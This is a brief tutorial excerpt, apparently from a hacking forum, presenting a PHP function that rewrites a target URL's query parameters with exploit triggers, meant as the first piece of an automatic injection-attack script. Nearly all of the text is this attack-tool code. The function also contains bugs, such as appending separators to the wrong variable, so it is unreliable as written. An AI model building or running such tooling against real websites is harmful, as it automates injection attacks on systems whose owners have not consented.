..cool, we will make a new module and not just some new module, nope let's make a fully automatic injection script! This tutorial is the first step into making this. Let's first..
THC xConverter is a tool that makes use of (php) functions in order to calculate, fetch, convert and encrypt data
<?php
/* Creates attack url
Poisons an attack url with exploits
PARAMETERS:
$sUrl: full url
$aExploitsData: exploit array in inject.php
$sExploit: exploit to use
$mVars:
ARRAY: variables to attack
BOOLEAN: poison all variables
RETURNS:
STRING: filtered data
*/
function ExploitUrl($sUrl,$aExploitsData,$sExploit,$mVars=false){
$aUrl = @parse_url($sUrl);
if(!isset($aUrl['query']) || !isset($aUrl['host']) || !isset($aUrl['path'])){
// invalid url
return(false);
}
if(!isset($aExploitsData[$sExploit])){
// unknown exploit
return(false);
}
if(strpos($aUrl['query'],"=")===false){
// no values, no luck
return(false);
}
$aVarValues = @explode("&",$aUrl['query']);
if(!$iVarValues = @count($aVarValues)){
return(false);
}
$sUrl2 = "http://".$aUrl['host'].$aUrl['path']."?";
for($x=0;$x<$iVarValues;$x++){
$aValues = explode("=",$aVarValues[$x]);
if(is_array($mVars)){
if(!in_array($aValues[0],$mVars)){
$sUrl2 .= $aVarValues[$x];
continue;
}
}
if($x>0){
$sUrl .= "&";
}
$sUrl2 .= $aValues[0]."=".$aExploitsData[$sExploit]['trigger'];
}
if($sUrl2==$sUrl){
// failed to create url
return(false);
}
return($sUrl2);
}
?>